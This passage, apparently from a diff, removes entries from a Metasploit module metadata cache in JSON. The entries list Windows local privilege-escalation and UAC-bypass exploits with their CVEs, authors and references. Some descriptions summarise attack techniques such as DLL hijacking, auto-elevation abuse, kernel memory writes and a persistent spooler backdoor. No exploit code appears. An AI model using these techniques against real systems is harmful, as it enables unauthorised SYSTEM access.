12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_sluihijack.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_sluihijack", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bypassuac_vbs": { - "name": "Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)", - "fullname": "exploit/windows/local/bypassuac_vbs", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-08-22", - "type": "exploit", - "author": [ - "Vozzie", - "Ben Campbell " - ], - "description": "This module will bypass Windows UAC by utilizing the missing .manifest on the script host\n cscript/wscript.exe binaries.", - "references": [ - "URL-http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html", - "URL-https://github.com/Vozzie/uacscript" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_vbs.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_vbs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_windows_store_filesys": { - "name": "Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)", - "fullname": "exploit/windows/local/bypassuac_windows_store_filesys", - "aliases": [], - "rank": 0, - "disclosure_date": "2019-08-22", - "type": "exploit", - "author": [ - "ACTIVELabs", - "sailay1996", - "timwr" - ], - "description": "This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool\n is run with the \"autoElevate\" property set to true, however it can be moved to\n a new Windows directory containing a space (C:\\Windows \\System32\\) where, upon\n execution, it will load our payload dll (propsys.dll).", - "references": [ - "URL-https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html", - "URL-https://github.com/sailay1996/UAC_bypass_windows_store", - "URL-https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_windows_store_filesys.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_windows_store_filesys", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_windows_store_reg": { - "name": "Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry", - "fullname": "exploit/windows/local/bypassuac_windows_store_reg", - "aliases": [], - "rank": 0, - "disclosure_date": "2019-02-19", - "type": "exploit", - "author": [ - "ACTIVELabs", - "sailay1996", - "bwatters-r7" - ], - "description": "This module exploits a flaw in the WSReset.exe file associated with the Windows\n Store. This binary has autoelevate privs, and it will run a binary file\n contained in a low-privilege registry location. By placing a link to\n the binary in the registry location, WSReset.exe will launch the binary as\n a privileged user.", - "references": [ - "URL-https://www.activecyber.us/activelabs/windows-uac-bypass", - "URL-https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html", - "URL-https://github.com/sailay1996/UAC_bypass_windows_store" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_windows_store_reg.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_windows_store_reg", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/canon_driver_privesc": { - "name": "Canon Driver Privilege Escalation", - "fullname": "exploit/windows/local/canon_driver_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-08-07", - "type": "exploit", - "author": [ - "Jacob Baines", - "Shelby Pace" - ], - "description": "Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files\n within the \"CanonBJ\" directory and its subdirectories. By overwriting the DLL at\n C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll\n with a malicious DLL at the right time whilst running the C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs\n script to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program,\n which runs as NT AUTHORITY\\SYSTEM, to successfully load the malicious DLL. Successful exploitation\n will grant attackers code execution as the NT AUTHORITY\\SYSTEM user.\n\n This module leverages the prnmngr.vbs script\n to add and delete printers. Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.", - "references": [ - "CVE-2021-38085" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/canon_driver_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/canon_driver_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "unreliable-session" - ], - "Stability": [ - "service-resource-loss" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/capcom_sys_exec": { - "name": "Windows Capcom.sys Kernel Execution Exploit (x64 only)", - "fullname": "exploit/windows/local/capcom_sys_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "TheWack0lian", - "OJ Reeves" - ], - "description": "This module abuses the Capcom.sys kernel driver's function that allows for an\n arbitrary function to be executed in the kernel from user land. This function\n purposely disables SMEP prior to invoking a function given by the caller.\n This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.\n Note that builds after 22000.194 contain deny lists that prevent this driver from loading.", - "references": [ - "URL-https://twitter.com/TheWack0lian/status/779397840762245124" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-09-08 13:05:44 +0000", - "path": "/modules/exploits/windows/local/capcom_sys_exec.rb", - "is_install_path": true, - "ref_name": "windows/local/capcom_sys_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/comahawk": { - "name": "Microsoft UPnP Local Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/comahawk", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-11-12", - "type": "exploit", - "author": [ - "NCC Group", - "hoangprod", - "bwatters-r7" - ], - "description": "This exploit uses two vulnerabilities to execute a command as an elevated user.\n The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to\n NT AUTHORITY\\LOCAL SERVICE\n The second (CVE-2019-1322) leverages the Update Orchestrator Service to\n elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.", - "references": [ - "CVE-2019-1322", - "CVE-2019-1405", - "EDB-47684", - "URL-https://github.com/apt69/COMahawk", - "URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/", - "URL-https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/comahawk.rb", - "is_install_path": true, - "ref_name": "windows/local/comahawk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/current_user_psexec": { - "name": "PsExec via Current User Token", - "fullname": "exploit/windows/local/current_user_psexec", - "aliases": [], - "rank": 600, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "egypt ", - "jabra" - ], - "description": "This module uploads an executable file to the victim system, creates\n a share containing that executable, creates a remote service on each\n target system using a UNC path to that file, and finally starts the\n service(s).\n\n The result is similar to psexec but with the added benefit of using\n the session's current authentication token instead of having to know\n a password or hash.", - "references": [ - "CVE-1999-0504", - "OSVDB-3106", - "URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/local/current_user_psexec.rb", - "is_install_path": true, - "ref_name": "windows/local/current_user_psexec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2017_8464_lnk_lpe": { - "name": "LNK Code Execution Vulnerability", - "fullname": "exploit/windows/local/cve_2017_8464_lnk_lpe", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-06-13", - "type": "exploit", - "author": [ - "Uncredited", - "Yorick Koster", - "Spencer McIntyre" - ], - "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n The PATH option must be an absolute path to a writeable directory which is indexed for\n searching. If no PATH is specified, the module defaults to %USERPROFILE%.", - "references": [ - "CVE-2017-8464", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464", - "URL-http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt", - "URL-https://msdn.microsoft.com/en-us/library/dd871305.aspx", - "URL-http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm", - "URL-https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64", - "Windows x86" - ], - "mod_time": "2023-03-13 10:31:27 +0000", - "path": "/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2017_8464_lnk_lpe", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2018_8453_win32k_priv_esc": { - "name": "Windows NtUserSetWindowFNID Win32k User Callback", - "fullname": "exploit/windows/local/cve_2018_8453_win32k_priv_esc", - "aliases": [], - "rank": 0, - "disclosure_date": "2018-10-09", - "type": "exploit", - "author": [ - "ze0r", - "Kaspersky Lab", - "Jacob Robles" - ], - "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component\n fails to properly handle objects in memory, aka \"Win32k Elevation of Privilege Vulnerability.\"\n This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows\n Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,\n Windows 10, Windows 10 Servers.\n This module is tested against Windows 10 v1703 x86.", - "references": [ - "CVE-2018-8453", - "URL-https://github.com/ze0r/cve-2018-8453-exp", - "URL-https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig", - "URL-https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ", - "URL-https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 v1703 (Build 15063) x86" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2018_8453_win32k_priv_esc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ], - "Stability": [ - "crash-os-restarts" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2019_1458_wizardopium": { - "name": "Microsoft Windows Uninitialized Variable Local Privilege Elevation", - "fullname": "exploit/windows/local/cve_2019_1458_wizardopium", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-12-10", - "type": "exploit", - "author": [ - "piotrflorczyk", - "unamer", - "timwr" - ], - "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n to write a limited amount of controlled data to an attacker controlled address\n in kernel memory. By utilizing this vulnerability to execute controlled writes\n to kernel memory, an attacker can gain arbitrary code execution\n as the SYSTEM user.\n\n This module has been tested against Windows 7 x64 SP1. Offsets within the\n exploit code may need to be adjusted to work with other versions of Windows.\n The exploit can only be triggered once against the target and can cause the\n target machine to reboot when the session is terminated.", - "references": [ - "CVE-2019-1458", - "URL-https://github.com/unamer/CVE-2019-1458", - "URL-https://github.com/piotrflorczyk/cve-2019-1458_POC", - "URL-https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/", - "URL-https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2019_1458_wizardopium.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2019_1458_wizardopium", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2020_0668_service_tracing": { - "name": "Service Tracing Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/cve_2020_0668_service_tracing", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-02-11", - "type": "exploit", - "author": [ - "itm4n", - "bwatters-r7" - ], - "description": "This module leverages a trusted file overwrite with a DLL hijacking\n vulnerability to gain SYSTEM-level access on vulnerable Windows 10 x64\n targets.", - "references": [ - "CVE-2020-0668", - "URL-https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/", - "URL-https://github.com/itm4n/SysTracingPoc", - "URL-https://github.com/RedCursorSecurityConsulting/CVE-2020-0668", - "PACKETSTORM-156576", - "URL-https://attackerkb.com/assessments/ea5921d4-6046-4a3b-963f-08e8bde1762a", - "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2024-12-12 17:11:53 +0000", - "path": "/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_0668_service_tracing", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2020_0787_bits_arbitrary_file_move": { - "name": "Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-03-10", - "type": "exploit", - "author": [ - "itm4n", - "gwillcox-r7" - ], - "description": "This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the\n Background Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll\n with a malicious DLL containing the attacker's payload.\n\n To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which\n will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking\n issue within the Update Session Orchestrator Service.\n\n Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the\n Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested,\n so your mileage may vary on Windows Server 2016 and later.", - "references": [ - "CVE-2020-0787", - "URL-https://itm4n.github.io/cve-2020-0787-windows-bits-eop/", - "URL-https://github.com/itm4n/BitsArbitraryFileMove", - "URL-https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8", - "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html", - "URL-https://itm4n.github.io/usodllloader-part1/", - "URL-https://itm4n.github.io/usodllloader-part2/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows DLL Dropper" - ], - "mod_time": "2024-02-07 11:20:12 +0000", - "path": "/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_0787_bits_arbitrary_file_move", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2020_0796_smbghost": { - "name": "SMBv3 Compression Buffer Overflow", - "fullname": "exploit/windows/local/cve_2020_0796_smbghost", - "aliases": [], - "rank": 400, - "disclosure_date": "2020-03-13", - "type": "exploit", - "author": [ - "Daniel García Gutiérrez", - "Manuel Blanco Parajón", - "Spencer McIntyre" - ], - "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself\n before injecting a payload into winlogon.exe.", - "references": [ - "CVE-2020-0796", - "URL-https://github.com/danigargu/CVE-2020-0796", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 v1903-1909 x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2020_0796_smbghost.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_0796_smbghost", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "SMBGhost", - "CoronaBlue" - ], - "Stability": [ - "crash-os-restarts" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ], - "RelatedModules": [ - "exploit/windows/smb/cve_2020_0796_smbghost" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2020_1048_printerdemon": { - "name": "Microsoft Spooler Local Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/cve_2020_1048_printerdemon", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-11-04", - "type": "exploit", - "author": [ - "Yarden Shafir", - "Alex Ionescu", - "shubham0d", - "bwatters-r7" - ], - "description": "This exploit leverages a file write vulnerability in the print spooler service\n which will restart if stopped. Because the service cannot be stopped long\n enough to remove the dll, there is no way to remove the dll once\n it is loaded by the service. Essentially, on default settings, this module\n adds a permanent elevated backdoor.", - "references": [ - "CVE-2020-1048", - "URL-https://windows-internals.com/printdemon-cve-2020-1048/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_1048_printerdemon", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2020_1054_drawiconex_lpe": { - "name": "Microsoft Windows DrawIconEx OOB Write Local Privilege Elevation", - "fullname": "exploit/windows/local/cve_2020_1054_drawiconex_lpe", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-02-20", - "type": "exploit", - "author": [ - "Netanel Ben-Simon", - "Yoav Alon", - "bee13oy", - "timwr" - ], - "description": "This module exploits CVE-2020-1054, an out of bounds write reachable from DrawIconEx\n within win32k. The out of bounds write can be used to overwrite the pvbits of a\n SURFOBJ. By utilizing this vulnerability to execute controlled writes to kernel\n memory, an attacker can gain arbitrary code execution as the SYSTEM user.\n\n This module has been tested against a fully updated Windows 7 x64 SP1. Offsets\n within the exploit code may need to be adjusted to work with other versions of\n Windows.", - "references": [ - "CVE-2020-1054", - "URL-https://cpr-zero.checkpoint.com/vulns/cprid-2153/", - "URL-https://0xeb-bp.com/blog/2020/06/15/cve-2020-1054-analysis.html", - "URL-https://github.com/DreamoneOnly/2020-1054/blob/master/x64_src/main.cpp", - "URL-https://github.com/KaLendsi/CVE-2020-1054/blob/master/CVE-2020-1054/exploit.cpp", - "URL-https://github.com/Iamgublin/CVE-2020-1054/blob/master/ConsoleApplication4.cpp" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_1054_drawiconex_lpe", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2020_1313_system_orchestrator": { - "name": "Windows Update Orchestrator unchecked ScheduleWork call", - "fullname": "exploit/windows/local/cve_2020_1313_system_orchestrator", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-11-04", - "type": "exploit", - "author": [ - "Imre Rad", - "bwatters-r7" - ], - "description": "This exploit uses access to the UniversalOrchestrator ScheduleWork API call\n which does not verify the caller's token before scheduling a job to be run\n as SYSTEM. You cannot schedule something in a given time, so the payload will\n execute as system sometime in the next 24 hours.", - "references": [ - "CVE-2020-1313", - "URL-https://github.com/irsl/CVE-2020-1313" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_1313_system_orchestrator", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2020_1337_printerdemon": { - "name": "Microsoft Spooler Local Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/cve_2020_1337_printerdemon", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-11-04", - "type": "exploit", - "author": [ - "Peleg Hadar", - "Tomer Bar", - "404death", - "sailay1996", - "bwatters-r7" - ], - "description": "This exploit leverages a file write vulnerability in the print spooler service\n which will restart if stopped. Because the service cannot be stopped long\n enough to remove the dll, there is no way to remove the dll once\n it is loaded by the service. Essentially, on default settings, this module\n adds a permanent elevated backdoor.", - "references": [ - "CVE-2020-1337", - "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337", - "URL-https://github.com/sailay1996/cve-2020-1337-poc", - "URL-https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_1337_printerdemon", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2020_17136": { - "name": "CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP", - "fullname": "exploit/windows/local/cve_2020_17136", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-03-10", - "type": "exploit", - "author": [ - "James Foreshaw", - "Grant Willcox" - ], - "description": "The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December\n 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when\n calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()\n function with attacker controlled input. This meant that files were created with\n KernelMode permissions, thereby bypassing any security checks that would otherwise\n prevent a normal user from being able to create files in directories\n they don't have permissions to create files in.\n\n This module abuses this vulnerability to perform a DLL hijacking attack against the\n Microsoft Storage Spaces SMP service, which grants the attacker code execution as the\n NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one\n of the Meterpreter payloads, as doing so will allow them to subsequently escalate their\n new session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command\n to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.", - "references": [ - "CVE-2020-17136", - "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=2082", - "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows DLL Dropper" - ], - "mod_time": "2024-02-07 11:25:41 +0000", - "path": "/modules/exploits/windows/local/cve_2020_17136.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_17136", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2021_21551_dbutil_memmove": { - "name": "Dell DBUtil_2_3.sys IOCTL memmove", - "fullname": "exploit/windows/local/cve_2021_21551_dbutil_memmove", - "aliases": [], - "rank": 400, - "disclosure_date": "2021-05-04", - "type": "exploit", - "author": [ - "Kasif Dekel", - "SentinelLabs", - "Spencer McIntyre" - ], - "description": "The DBUtil_2_3.sys driver distributed by Dell exposes an unprotected IOCTL interface that can be abused by\n an attacker read and write kernel-mode memory.", - "references": [ - "CVE-2021-21551", - "URL-https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", - "URL-https://www.dell.com/support/kbdoc/ro-ro/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2021_21551_dbutil_memmove", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2021_40449": { - "name": "Win32k NtGdiResetDC Use After Free Local Privilege Elevation", - "fullname": "exploit/windows/local/cve_2021_40449", - "aliases": [], - "rank": 400, - "disclosure_date": "2021-10-12", - "type": "exploit", - "author": [ - "IronHusky", - "Costin Raiu", - "Boris Larin", - "Red Raindrop Team of Qi'anxin Threat Intelligence Center", - "KaLendsi", - "ly4k", - "Grant Willcox" - ], - "description": "A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be 